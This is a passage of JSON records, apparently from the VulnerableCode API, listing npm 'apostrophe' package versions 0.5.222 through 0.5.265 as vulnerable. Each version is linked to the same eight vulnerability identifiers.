rl":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.222"},{"url":"http://public2.vulnerablecode.io/api/packages/268306?format=json","purl":"pkg:npm/apostrophe@0.5.223","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.223"},{"url":"http://public2.vulnerablecode.io/api/packages/268307?format=json","purl":"pkg:npm/apostrophe@0.5.224","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.224"},{"url":"http://public2.vulnerablecode.io/api/packages/268308?format=json","purl":"pkg:npm/apostrophe@0.5.225","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.225"},{"url":"http://public2.vulnerablecode.io/api/packages/268309?format=json","purl":"pkg:npm/apostrophe@0.5.226","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.226"},{"url":"http://public2.vulnerablecode.io/api/packages/268310?format=json","purl":"pkg:npm/apostrophe@0.5.227","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.227"},{"url":"http://public2.vulnerablecode.io/api/packages/268311?format=json","purl":"pkg:npm/apostrophe@0.5.228","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.228"},{"url":"http://public2.vulnerablecode.io/api/packages/268312?format=json","purl":"pkg:npm/apostrophe@0.5.229","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.229"},{"url":"http://public2.vulnerablecode.io/api/packages/268313?format=json","purl":"pkg:npm/apostrophe@0.5.230","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.230"},{"url":"http://public2.vulnerablecode.io/api/packages/268314?format=json","purl":"pkg:npm/apostrophe@0.5.231","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.231"},{"url":"http://public2.vulnerablecode.io/api/packages/268315?format=json","purl":"pkg:npm/apostrophe@0.5.232","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.232"},{"url":"http://public2.vulnerablecode.io/api/packages/268316?format=json","purl":"pkg:npm/apostrophe@0.5.233","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.233"},{"url":"http://public2.vulnerablecode.io/api/packages/268317?format=json","purl":"pkg:npm/apostrophe@0.5.234","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.234"},{"url":"http://public2.vulnerablecode.io/api/packages/268318?format=json","purl":"pkg:npm/apostrophe@0.5.235","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.235"},{"url":"http://public2.vulnerablecode.io/api/packages/268319?format=json","purl":"pkg:npm/apostrophe@0.5.236","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.236"},{"url":"http://public2.vulnerablecode.io/api/packages/268320?format=json","purl":"pkg:npm/apostrophe@0.5.237","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.237"},{"url":"http://public2.vulnerablecode.io/api/packages/268321?format=json","purl":"pkg:npm/apostrophe@0.5.238","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.238"},{"url":"http://public2.vulnerablecode.io/api/packages/268322?format=json","purl":"pkg:npm/apostrophe@0.5.239","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.239"},{"url":"http://public2.vulnerablecode.io/api/packages/268323?format=json","purl":"pkg:npm/apostrophe@0.5.240","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.240"},{"url":"http://public2.vulnerablecode.io/api/packages/268324?format=json","purl":"pkg:npm/apostrophe@0.5.241","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.241"},{"url":"http://public2.vulnerablecode.io/api/packages/268325?format=json","purl":"pkg:npm/apostrophe@0.5.242","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.242"},{"url":"http://public2.vulnerablecode.io/api/packages/268326?format=json","purl":"pkg:npm/apostrophe@0.5.243","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.243"},{"url":"http://public2.vulnerablecode.io/api/packages/268327?format=json","purl":"pkg:npm/apostrophe@0.5.244","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.244"},{"url":"http://public2.vulnerablecode.io/api/packages/268328?format=json","purl":"pkg:npm/apostrophe@0.5.245","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.245"},{"url":"http://public2.vulnerablecode.io/api/packages/268329?format=json","purl":"pkg:npm/apostrophe@0.5.246","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.246"},{"url":"http://public2.vulnerablecode.io/api/packages/268330?format=json","purl":"pkg:npm/apostrophe@0.5.247","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.247"},{"url":"http://public2.vulnerablecode.io/api/packages/268331?format=json","purl":"pkg:npm/apostrophe@0.5.248","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.248"},{"url":"http://public2.vulnerablecode.io/api/packages/268332?format=json","purl":"pkg:npm/apostrophe@0.5.249","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.249"},{"url":"http://public2.vulnerablecode.io/api/packages/268333?format=json","purl":"pkg:npm/apostrophe@0.5.250","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.250"},{"url":"http://public2.vulnerablecode.io/api/packages/268334?format=json","purl":"pkg:npm/apostrophe@0.5.251","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.251"},{"url":"http://public2.vulnerablecode.io/api/packages/268335?format=json","purl":"pkg:npm/apostrophe@0.5.252","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.252"},{"url":"http://public2.vulnerablecode.io/api/packages/268336?format=json","purl":"pkg:npm/apostrophe@0.5.253","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.253"},{"url":"http://public2.vulnerablecode.io/api/packages/268337?format=json","purl":"pkg:npm/apostrophe@0.5.254","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.254"},{"url":"http://public2.vulnerablecode.io/api/packages/268338?format=json","purl":"pkg:npm/apostrophe@0.5.255","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.255"},{"url":"http://public2.vulnerablecode.io/api/packages/268339?format=json","purl":"pkg:npm/apostrophe@0.5.256","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.256"},{"url":"http://public2.vulnerablecode.io/api/packages/268340?format=json","purl":"pkg:npm/apostrophe@0.5.257","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.257"},{"url":"http://public2.vulnerablecode.io/api/packages/268341?format=json","purl":"pkg:npm/apostrophe@0.5.258","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.258"},{"url":"http://public2.vulnerablecode.io/api/packages/268342?format=json","purl":"pkg:npm/apostrophe@0.5.259","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.259"},{"url":"http://public2.vulnerablecode.io/api/packages/268343?format=json","purl":"pkg:npm/apostrophe@0.5.260","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.260"},{"url":"http://public2.vulnerablecode.io/api/packages/268344?format=json","purl":"pkg:npm/apostrophe@0.5.261","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.261"},{"url":"http://public2.vulnerablecode.io/api/packages/268345?format=json","purl":"pkg:npm/apostrophe@0.5.262","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.262"},{"url":"http://public2.vulnerablecode.io/api/packages/268346?format=json","purl":"pkg:npm/apostrophe@0.5.263","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.263"},{"url":"http://public2.vulnerablecode.io/api/packages/268347?format=json","purl":"pkg:npm/apostrophe@0.5.264","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.264"},{"url":"http://public2.vulnerablecode.io/api/packages/268348?format=json","purl":"pkg:npm/apostrophe@0.5.265","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.265"},{"url":"http://public2.vulnerablecode.io/api/packages/268349?format=json","purl":"pkg:npm/apostrophe@0.5.266","is_vulnerable":true,"affected_by_vulnerabilities":[